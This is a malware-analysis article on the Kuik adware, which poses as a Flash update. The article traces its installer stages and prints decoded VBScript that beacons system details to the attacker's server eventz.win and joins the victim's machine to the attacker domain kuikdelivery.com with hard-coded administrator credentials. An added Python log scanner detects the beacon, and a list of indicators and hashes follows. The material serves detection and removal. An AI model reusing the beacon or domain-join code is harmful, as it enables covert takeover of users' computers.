2025-04-01 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/02 Report--
This article is an introduction to the Kuik adware. Many readers may not be familiar with it, so the key findings are summarized below; we hope you will gain something from them.
Recently, our security research team discovered a piece of malicious adware called Kuik. Its attackers use an unusual technique, joining the victim's machine to a domain they control, to push Google Chrome extensions and cryptocurrency miners onto victims. Below we give a technical analysis of the adware and removal instructions.
Technical Description
Stage 1 - .NET installer
0ba20fee958b88c48f3371ec8d8a8e5d
The first stage is an application written in .NET that carries the Adobe Flash Player icon. It is a typical malicious bundle, masquerading as an Adobe Flash Player update to trick users into installing it.
We opened it in a .NET decompiler (dnSpy) and found that the project's original name was WWVaper.
It has three internal resources:
Certificate (svr.crt)
A legitimate Flash.
Next Stage Component (upp.exe)
Certificate:
-----BEGIN CERTIFICATE-----
[certificate body not reproduced on the page]
-----END CERTIFICATE-----
Certificate Details:
The certificate points to a DNS name for yahoo.com. However, the certificate path is invalid:
The .NET installer is responsible for installing the malicious certificate and the other components. First, it enumerates the network interfaces and adds the IPs it collects to a list:
It then sets a new DNS server address (18.219.162.248) on each collected interface and installs its own certificate (svr.crt):
Stage 2 - upp.exe
3a13b73f823f081bcdc57ea8cc3140ac
This app is an unobfuscated installer bundle. Inside, we found a cabinet file:
It contains the additional modules that are dropped:
The application "install.exe" is deployed with "setup.bat" as parameter.
Stage 3 - Components unpacked from the cabinet
The application install.exe is simple. Its sole purpose is to run the next process with elevated privileges. Its main function is shown below:
The script setup.bat deploys another component called SqadU9FBEV.bat:
It delays execution by pinging 127.0.0.1, then runs the second, encoded script, passing it an activity ID as an argument:
The next element is deployed as an encoded VBS script:
After decoding it, we can read the contents of the script, NYkjVVXepl.vbs, in clear text. It fingerprints the system and beacons to a server:
Set SystemSet = GetObject("winmgmts:").InstancesOf("Win32_OperatingSystem")
For Each System In SystemSet
    winVer = System.Caption
Next

' Reports an event to the attacker's tracking server. UUID is set earlier
' in the script (not reproduced on the page); the campaign is hard-coded
' and the channel is the script's first command-line argument.
Function trackEvent(eventName, extraData)
    Set tracking = CreateObject("MSXML2.XMLHTTP")
    tracking.open "GET", "http://eventz.win:13463/trk?event=" & eventName & "&computer=" & UUID & "&windows-version=" & winVer & "&error=" & err.Number & ";" & err.Description & ";" & err.Source & ";" & extraData & "&campaign=qavriknzkk&channel=" & WScript.Arguments.Item(0), False
    tracking.send
    err.clear
End Function
One of the most interesting pieces is the code that joins the infected computer to the attacker's domain, kuikdelivery.com:
Set objNetwork = CreateObject("WScript.Network")
strComputer = objNetwork.ComputerName
Set objComputer = GetObject("winmgmts:" & "{impersonationLevel=Impersonate,authenticationLevel=Pkt}!\\" & strComputer & "\root\cimv2:Win32_ComputerSystem.Name='" & strComputer & "'")
' JOIN_DOMAIN, ACCT_CREATE, DOMAIN_JOIN_IF_JOINED and JOIN_UNSECURE are the
' Win32_ComputerSystem.JoinDomainOrWorkgroup option flags, defined earlier in
' the script (not reproduced on the page). The OU is taken from the first
' command-line argument.
ReturnValue = objComputer.JoinDomainOrWorkGroup("kuikdelivery.com", "4sdOwt7b7L1vAKR6U7", "kuikdelivery.com\administrator", "OU=" & WScript.Arguments.Item(0) & ",DC=kuikdelivery,DC=com", JOIN_DOMAIN + ACCT_CREATE + DOMAIN_JOIN_IF_JOINED + JOIN_UNSECURE)
If (ReturnValue <> 0) Or (err.Number <> 0) Then
    trackEvent "join-domain-failed", ReturnValue
    WScript.Quit 1
Else
    trackEvent "join-domain-success", Null
    WScript.Quit 0
End If
Payloads
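A defender-side example, added here and not part of the original write-up or of any Malwarebytes tooling: a small Python script that scans a web-proxy log for the beacon the decoded script sends (the trackEvent() GET to eventz.win:13463/trk), parses the event, computer, campaign and channel fields it carries, summarizes the join-domain-success / join-domain-failed results per client, and flags .crx downloads from the domains in the IOC list further down. The log line format and every log line are constructed sample data; the only values taken from the page are the domains eventz.win, kuikdelivery.com, d-and-h.com and tripan.me, the campaign ID and the event names.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the write-up: the beacon host used by trackEvent(),
# the domain the script joins, and the two other domains that host the
# Chrome extension payloads (IOC section).
KUIK_DOMAINS = {"eventz.win", "kuikdelivery.com", "d-and-h.com", "tripan.me"}
BEACON_HOST = "eventz.win"
BEACON_PATH = "/trk"

# Constructed sample proxy log (not captured traffic), one request per line:
# "<epoch> <client_ip> <method> <url> <status>". The beacon lines mirror the
# query string built by trackEvent(); ';' inside the error field is %3B-encoded.
SAMPLE_LOG = """\
1527000001.123 10.0.0.15 GET http://eventz.win:13463/trk?event=join-domain-success&computer=ABC-123&windows-version=Microsoft%20Windows%2010%20Pro&error=0%3B%3B%3B&campaign=qavriknzkk&channel=x7 200
1527000002.456 10.0.0.15 GET http://d-and-h.com/fljlngkbcebmlpdlojnndahifaocnipb.crx 200
1527000003.789 10.0.0.22 GET http://www.example.com/index.html 200
1527000004.000 10.0.0.31 GET http://eventz.win:13463/trk?event=join-domain-failed&computer=DEF-456&windows-version=Microsoft%20Windows%207&error=1355%3BThe%20specified%20domain%20does%20not%20exist%3B%3B&campaign=qavriknzkk&channel=x7 200
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)


def host_matches(host, domains):
    """True if host equals one of the indicator domains or is a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def classify(url):
    """Return a finding dict for a Kuik-related URL, or None for anything else."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    if not host_matches(host, KUIK_DOMAINS):
        return None
    if host_matches(host, {BEACON_HOST}) and parts.path == BEACON_PATH:
        query = parse_qs(parts.query)

        def first(key):
            return query.get(key, [""])[0]

        return {
            "type": "beacon",
            "host": host,
            "event": first("event"),
            "computer": first("computer"),
            "windows_version": first("windows-version"),
            "error": first("error"),
            "campaign": first("campaign"),
            "channel": first("channel"),
        }
    if parts.path.lower().endswith(".crx"):
        return {"type": "extension-download", "host": host, "path": parts.path}
    return {"type": "ioc-domain", "host": host, "path": parts.path}


def scan_log(text):
    """Parse each log line and collect findings, tagged with client IP and time."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        finding = classify(m["url"])
        if finding:
            finding["client"] = m["client"]
            finding["ts"] = m["ts"]
            findings.append(finding)
    return findings


def domain_join_outcomes(findings):
    """Map client IP -> last join-domain result the script reported for it."""
    outcomes = {}
    for f in findings:
        if f["type"] == "beacon" and f["event"].startswith("join-domain-"):
            outcomes[f["client"]] = f["event"]
    return outcomes


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["ts"], h["client"], h["type"], h.get("event", h.get("path", "")))
    print("domain join outcomes:", domain_join_outcomes(hits))
```

A join-domain-success beacon is the signal to act on first: it means the machine's domain membership has already been changed, so the host should be un-joined and reviewed, not just blocked from the listed domains.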
The adware serves a range of payloads; the attackers show a particular preference for fake Chrome extensions. Cryptocurrency miners are also being served:
Removal
Malwarebytes users (version 3.x) can remove this threat by running a full scan, which includes un-joining the machine from the malicious domain and restoring it to its original state.
IOCs
Kuik
b9323268bf81778329b8316dec8f093fe71104f16921a1c9358f7ba69dd52686
990c019319fc18dca473ac432cdf4c36944b0bce1a447e85ace819300903a79e
Chrome extensions
d-and-h[.]com/fljlngkbcebmlpdlojnndahifaocnipb.crx
d-and-h[.]com/123.crx
d-and-h[.]com/jpfhjoeaokamkacafjdjbjllgkfkakca.crx
d-and-h[.]com/mmemdlochnielijcfpmgiffgkpehgimj.crx
kuikdelivery[.]com/emhifpfmcmoghejbfcbnknjjpifkmddc.crx
tripan[.]me/kdobijehckphahlmkohehaciojbpmdbp.crx
Payloads
92996D9E7275006AB6E59CF4676ACBB2B4C0E0DF59011347CE207B219CB2B75133D86ABF26EFCDBD673DA5448C958863F384F4E3E678057D6FAB7359685012687889CB16DB3922BEEFB7310B832AE0EF60736843F4AD9FB2BFE9D8B05E48BECD761D62A22AE73307C679 B096030BF0EEC93555E13DC820931519183CAA9F1B2A871AD057247C023F68768724EBF23D00EF842F0B510A3ACE544A8948AE775712

After reading the above, you should have a better understanding of Kuik. If you want to learn more, please follow the industry information channel; thank you for your support.